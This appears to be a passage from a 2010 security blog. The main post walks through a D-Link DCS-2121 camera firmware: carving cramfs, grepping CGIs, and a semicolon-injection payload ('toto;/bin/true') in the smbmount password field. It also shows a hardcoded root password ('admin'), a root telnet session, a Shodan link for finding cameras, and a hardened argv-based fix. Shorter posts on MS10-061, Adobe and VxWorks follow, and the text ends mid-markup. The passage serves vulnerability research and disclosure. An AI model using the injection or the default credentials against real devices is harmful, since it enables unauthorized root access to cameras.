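    image = header + b"\x00" * (fs_size - len(header))
    return script + padding + image, len(script) + len(padding), fs_size


if __name__ == "__main__":
    # usage: python carve_cramfs.py <firmware.bin>   (script name is hypothetical)
    data = open(sys.argv[1], "rb").read()
    for offset, info in find_cramfs_images(data):
        print("cramfs at offset %d: %s" % (offset, info))
        out = "cramfs_%08x.img" % offset
        with open(out, "wb") as fh:
            fh.write(carve_cramfs(data, offset, info["size"]))
        print("wrote", out)
```

Carving by the declared size yields the exact image: on the real firmware, file reports 5791744 bytes, whereas the dd call above copied 6168576 bytes (everything up to the end of the file).<br />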
We now have full read access to the firmware, which leads to interesting discoveries. According to copyright strings, the camera itself is built around the <a href="http://www.prolific.com.tw/eng/Products.asp?ID=74">Prolific PL-1029</a> "System On a Chip". Many CGI files under "/var/www" call eval() with user-supplied parameters. There is also a promising "/var/www/cgi/admin/telnetd.cgi" script :)<br />
<br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#!/bin/sh</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># get current setting from tdb</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># format looks like VariableName_type</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">onGetSetting() {</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> result=""</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># make sure, ...</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># 1. $result is set</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># 2. variables in dumpXml are all set</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">onUpdateSetting() {</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> result="ok"</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> if [ "$command" = "on" ]; then</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> /usr/sbin/telnetd 1>/dev/null 2>/dev/null</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> else</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> killall telnetd 1>/dev/null 2>/dev/null</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> fi</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">onDumpXml() {</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> xmlBegin index.xsl home-left.lang index.lang</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> resultTag $result</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> xmlEnd</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">scenario=$(basename $0 | cut -d'.' -f1)</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">. ../../xmlFunctions.sh</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">. ../../cgiMain.sh</span></span><br />
<br />
However, we are going to focus on a very specific bug: "semicolon injection". In my experience, this bug plagues each and every Linux-based embedded device, ranging from the <a href="http://www.agp.dsl.pipex.com/telnet_server.html">OrangeBox</a> (now a dead link) to <a href="http://www.h-online.com/open/news/item/Root-vulnerability-in-DD-WRT-free-router-firmware-742605.html">DD-WRT</a>. Let's look for compiled CGIs that might be calling system().<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">var/www/cgi/admin$ fgrep system *</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file adv_audiovideo.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file adv_godev.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file adv_sdcard.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file calibration.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file export.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file go_sleep.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file import.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file netWizard.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file pt8051_settings.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file pt_settings.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file reboot.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file recorder_status.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file recorder_test.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file reset.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file rs485_control.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file tools_admin.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file tools_system.cgi matches</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">Binary file wireless_ate.cgi matches</span></span><br />
<br />
Let's focus on those files, and look for possibly insecure calls.<br />
<br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ strings -f * | grep "%s"</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">adv_godev.cgi: TinyDBError %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">adv_sdcard.cgi: rm -rf "%s"</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">adv_sdcard.cgi: %s/video</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">adv_sdcard.cgi: mkdir -m 0777 %s/video</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">adv_sdcard.cgi: find "%s" -type f -name "*" |wc -l</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">pt_settings.cgi: TinyDBError %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">recorder_test.cgi: TinyDBError %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">recorder_test.cgi: umount %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">recorder_test.cgi: mkdir -p %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">recorder_test.cgi: smbmount //%s/%s %s -o username=%s,password=%s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">recorder_test.cgi: touch %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">rs485_control.cgi: TinyDBError %s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">rs485_control.cgi: RS485PresetControl::%s(), unexpected command</span></span><br />
<br />
So … "recorder_test.cgi" potentially calls <b>system("smbmount //%s/%s %s -o username=%s,password=%s")</b> … Let's see if the "password" parameter is properly escaped.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://newsoft.dyndns.org/tech/DCS_false.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://newsoft.dyndns.org/tech/DCS_false.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span class="Apple-style-span" style="font-size: small;">Try #1 with password "toto". Command result is "mntFailure".</span></td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://newsoft.dyndns.org/tech/DCS_true.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://newsoft.dyndns.org/tech/DCS_true.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span class="Apple-style-span" style="font-size: small;">Try #2 with password "toto;/bin/true". Command result is "ok" :)</span></td></tr>
</tbody></table><br />
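The two tries above, replayed against a model, as an added example that is not the camera's code: the vulnerable string construction from recorder_test.cgi sits next to an argv-based form, and shell_commands() tokenizes the command line with Python's shlex the way a POSIX shell would, which shows why the second try came back "ok". Host, share and mount point names are made up.<br />

```python
import re
import shlex

# Format string recovered from recorder_test.cgi by `strings` in the post
SMBMOUNT_FMT = "smbmount //%s/%s %s -o username=%s,password=%s"

# Shell control operators that terminate a simple command (POSIX shell grammar)
CONTROL_OPERATORS = {";", "&", "&&", "||", "|", "|&", "(", ")"}


def build_command_unsafe(host, share, mountpoint, user, password):
    """Model of what the CGI does: splice request parameters into a command
    line that is then handed to system(), i.e. to /bin/sh -c."""
    return SMBMOUNT_FMT % (host, share, mountpoint, user, password)


def shell_commands(cmdline):
    """Tokenize cmdline as a POSIX shell would and split it into the separate
    simple commands the shell would run. This only models the parsing step
    to show the effect of the injection; nothing is executed."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok in CONTROL_OPERATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


_SAFE_FIELD = re.compile(r"[A-Za-z0-9._/-]+")


def build_argv_safe(host, share, mountpoint, user, password):
    """Hardened form: every field stays one argv element and the list is
    meant for execv()/subprocess.run(argv) with no shell in between, so a
    ';' in the password is just one more byte of one argument. Non-secret
    fields are additionally checked against an allowlist; the password is
    not, since legitimate passwords contain arbitrary symbols."""
    for name, value in (("host", host), ("share", share),
                        ("mountpoint", mountpoint), ("user", user)):
        if not _SAFE_FIELD.fullmatch(value):
            raise ValueError("rejected %s: %r" % (name, value))
    # A password on the command line is still visible in the process list;
    # a credentials file is the usual answer to that separate issue.
    return ["smbmount", "//%s/%s" % (host, share), mountpoint,
            "-o", "username=%s,password=%s" % (user, password)]


def demo():
    """Replay try #1 and try #2 from the post against the model."""
    for pw in ("toto", "toto;/bin/true"):
        line = build_command_unsafe("nas", "share", "/mnt/smb", "toto", pw)
        cmds = shell_commands(line)
        print("password %-16r -> %d command(s): %s" % (pw, len(cmds), cmds))
    argv = build_argv_safe("nas", "share", "/mnt/smb", "toto", "toto;/bin/true")
    print("argv form keeps the payload inside one argument:", argv[-1])
    # If a shell really cannot be avoided, shlex.join() quotes each element.
    print("quoted for a shell:", shlex.join(argv))


if __name__ == "__main__":
    demo()
```

The second try parses as two commands, smbmount failing as before and then /bin/true succeeding, which is the exit status the CGI turned into "ok".<br />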
It is now time to start that "/usr/sbin/telnetd" server :) But wait ... what is the "root" password?<br />
<br />
"/etc/passwd" and "/etc/shadow" are symbolic links to "/tmp/passwd" and "/tmp/shadow". Those files are created at boot time by "/etc/rc.d/rc.local" script.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span><br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">start() {</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">touch /tmp/group /tmp/passwd /tmp/shadow</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">echo 'root:x:0:' > /etc/group</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">echo 'root:x:0:0:Linux User,,,:/:/bin/sh' > /etc/passwd</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">echo 'root:$1$gmEGnzIX$bFqGa1xIsjGupHyfeHXWR/:20:0:99999:7:::' > /etc/shadow</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">#telnetd > /dev/null 2> /dev/null</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">/bin/agent &</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">#/sbin/syslogd</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">addlog System is booted up.</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">echo "rc.local start ok."</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">}</span></span><br />
<div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span></div><div><br />
</div><div>So ... the "root" password is hardcoded to "admin". How cool is that? ;)</div><div><br />
</div><div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ telnet 192.168.0.117 23</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">DCS-2121 login: root</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Password: admin</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">BusyBox v1.01 (2009.07.27-09:19+0000) Built-in shell (ash)</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Enter 'help' for a list of built-in commands.</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">~ # uname -a</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">uname -a</span></span></div><div><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">Linux DCS-2121 2.4.19-pl1029 #1 Mon Jul 27 17:21:05 CST 2009 armv4l unknown</span></span></div></div><br />
<br />
<span class="Apple-style-span" style="font-size: x-large;"><b>Conclusion</b></span><br />
<br />
As is often the case with Linux-based embedded firmware, a trivial "semicolon injection" bug can be found without any reverse engineering; grep is the only tool you need to reproduce this case at home.<br />
<br />
<span class="Apple-style-span" style="font-size: small;">Disclaimer (for not-so-funny people): yes this is "0day", unreported to the vendor. I even suspect the whole D-Link product line is vulnerable to the same bug (if not the whole world of low-end embedded systems (and even business class products)). However, since Web access requires authentication, this bug might be exploitable by administrators only, so it is only useful for people who would like to gain a shell on their own systems. Do not panic :)</span><br />
<span class="Apple-style-span" style="font-size: small;"><br />
</span><br />
<span class="Apple-style-span" style="font-size: small;">Bonus: <a href="http://www.shodanhq.com/?q=dcs-lig-httpd">how to find D-Link cameras on the Internet</a>.</span><br />
<br />
MS10-061: "this is not the 0day you are looking for" (newsoft, published 2010-09-17)<br />
<br />
As usual, <a href="http://www.microsoft.com/technet/security/bulletin/ms10-sep.mspx">Microsoft Patch Tuesday</a> has been interesting this month.<br />
<br />
<a href="http://www.microsoft.com/technet/security/bulletin/ms10-061.mspx">MS10-061</a> flaw strikes the Spooler service, and seems to have been exploited by the infamous <a href="http://www.symantec.com/connect/de/blogs/stuxnet-introduces-first-known-rootkit-scada-devices">StuxNet worm</a>.<br />
<br />
So, was it "0day" (as many people tend to believe, like <a href="http://expertmiami.blogspot.com/2010/09/stuxnet-et-ses-quatre-0days.html">Kostya</a>)? (no offense man ;)<br />
<br />
I'll let you read this press article from <a href="http://hakin9.org/">Hakin9</a> magazine, issue n°4/2009; you can <a href="http://newsoft.dyndns.org/tech/PrintYourShell.pdf">start reading at the bottom of page #29</a>.<br />
<br />
<br />
PS. For those of you who can read French, this article has also been quoted at the end of my "<a href="http://news0ft.blogspot.com/2009/07/lechec-de-la-securite-francaise.html">most viewed</a> (and commented)" blog post. Hidden gem :)newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com5tag:blogger.com,1999:blog-26480225.post-7059080893856938552010-09-14T16:00:00.000+01:002010-09-14T16:00:08.654+01:00Rapid publishing on recent Adobe flaws<div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;">"As usual", Adobe products (namely </span><span lang="EN-US"><a href="http://www.adobe.com/support/security/advisories/apsa10-02.html">Adobe Reader</a></span><span lang="EN-US" style="mso-ansi-language: EN-US;"> and </span><span lang="EN-US"><a href="http://www.adobe.com/support/security/advisories/apsa10-03.html">Flash Player</a></span><span lang="EN-US" style="mso-ansi-language: EN-US;">) were recently targeted by "0day" attacks in the wild.</span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;"></span>I did not have a look at the attacks myself, but several trusted sources (such as H. D. Moore) described the exploit as "great" because it is able to bypass DEP and ASLR on Windows Seven.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal"> </div><div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;">Various exploitation tricks have been detailed on blogs such as </span><span lang="EN-US"><a href="http://blog.metasploit.com/2010/09/return-of-unpublished-adobe.html">Metasploit</a></span><span lang="EN-US" style="mso-ansi-language: EN-US;"> and </span><span lang="EN-US"><a href="http://www.vupen.com/blog/">VUPEN</a></span><span lang="EN-US" style="mso-ansi-language: EN-US;">. ASLR bypass mostly relies on a library (namely "icucnv36.dll") not being ASLR-compatible and always being loaded at its preferred base address.</span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;">Now to the point: for years, I have been using the </span><span lang="EN-US"><a href="http://www.erratasec.com/lookingglass.html">LookingGlass</a></span><span lang="EN-US" style="mso-ansi-language: EN-US;"> tool for preliminary triage before any application audit. It has been flying under the radar, but it works really great, and it is </span><span lang="EN-US"><s>Open Source</s></span><span lang="EN-US" style="mso-ansi-language: EN-US;"> compiled in .NET bytecode.<o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;">Here is the result for an up-to-date Adobe Reader 9.3.4. It looks like there are still avenues for DEP/ASLR bypass :)</span></div><div class="MsoNormal"><span lang="EN-US" style="mso-ansi-language: EN-US;"><br />
</span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://newsoft.dyndns.org/tech/LookingGlass.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://newsoft.dyndns.org/tech/LookingGlass.png" /></a></div>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com1tag:blogger.com,1999:blog-26480225.post-24948470309978953502010-09-01T11:00:00.000+01:002010-09-01T11:00:00.674+01:00Follow-up on VxWorks issue<b><span class="Apple-style-span" style="font-size: x-large;">Introduction</span></b><br />
<div class="MsoNormal"><span lang="EN-US"><br />
</span></div><div class="MsoNormal"><span lang="EN-US">As a follow-up to </span><span lang="EN-US"><a href="http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html">H. D. Moore's research on VxWorks</a></span><span lang="EN-US">, I would like to share some personal thoughts on the matter.<o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US">I happen to have some experience with </span><span lang="EN-US"><a href="https://secure.wikimedia.org/wikipedia/en/wiki/VxWorks">VxWorks</a></span><span lang="EN-US">, since this operating system used to be quite popular among broadband modem manufacturers. And I have always been fascinated by those </span><span lang="EN-US"><a href="http://actes.sstic.org/SSTIC06/Securite_ADSL_en_France/">SpyBoxes</a></span><span lang="EN-US">.</span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US">VxWorks software is now easier to get hold of, since </span><span lang="EN-US"><a href="http://www.windriver.com/evaluations/gpp-ve/">trial/evaluation software</a></span><span lang="EN-US"> is readily available. However, back in the days of VxWorks 5 (and older), things were a bit trickier.<o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US">HDM pointed out that VxWorks source code leaked on the </span><span lang="EN-US"><a href="http://www.pudn.com/downloads115/sourcecode/embed/detail486003.html">PUDN Web site</a></span><span lang="EN-US">. As a rule of thumb, most of the world's intellectual property is available from the Chinese Internet. </span>However, there are many other ways to browse the source (<i>warning: all links below might disappear from the Internet without warning</i>).</div><div class="MsoNormal"></div><ul><li>Universities and student projects [<a href="http://www.cs.cmu.edu/afs/cs.cmu.edu/project/lri/vxworks/">1</a>]</li>
<li>Training courses [<a href="http://ebook.pldworld.com/_WindRiver/Tornado_VxWorks_Training/">1</a>]</li>
<li><span lang="EN-US">VxWorks enthusiasts [</span><span lang="EN-US"><a href="http://www.vxdev.com/">1</a></span><span lang="EN-US">] [</span><span lang="EN-US"><a href="http://iwiwdsmi.blogspot.com/search/label/vxworks">2</a></span><span lang="EN-US">] [</span><span lang="EN-US"><a href="http://www.xs4all.nl/~borkhuis/vxworks/vxw_pt1.html">3</a></span><span lang="EN-US">]</span></li>
<li><span lang="EN-US"></span><span lang="EN-US">Third-party SDKs (for systems that have been built on the top of VxWorks) [</span><span lang="EN-US"><a href="http://siteadvisor.pl/sites/quantumdata.com/downloads/10247794/">1</a></span><span lang="EN-US">]</span></li>
<li><span lang="EN-US"></span><span lang="EN-US">Hardware hackers [</span><span lang="EN-US"><a href="http://jjaf.de/eci/hi-focus/atu-r/telnetd/">1</a></span><span lang="EN-US">]</span></li>
</ul><div class="MsoNormal"><span lang="EN-US">In the end, whatever you are looking for, the Internet has it :)<o:p></o:p></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US"><b><span class="Apple-style-span" style="font-size: x-large;">Authentication</span></b><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US"><br />
</span></div><div class="MsoNormal"><span lang="EN-US">Now let's have a look at the VxWorks authentication mechanism (described <a href="http://www-kryo.desy.de/documents/vxWorks/V5.5/vxworks/ref/loginLib.html">here</a> and <a href="http://www.2beanet.com/vxworks/target/src/ostool/loginLib.c.html">here</a>).</span><br />
<span lang="EN-US"><br />
</span><br />
<span lang="EN-US">Quoting <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">usrConfig.c</span></span>:</span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(…)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">loginInit (); /* initialize login table */<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">shellLoginInstall (loginPrompt, NULL); /* install security program */<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">/* add additional users here as required */<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">loginUserAdd (LOGIN_USER_NAME, LOGIN_PASSWORD);<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">}<o:p></o:p></span></span></span></div><div class="MsoNormal"><span lang="EN-US"><span class="Apple-style-span" style="font-family: 'Courier New', 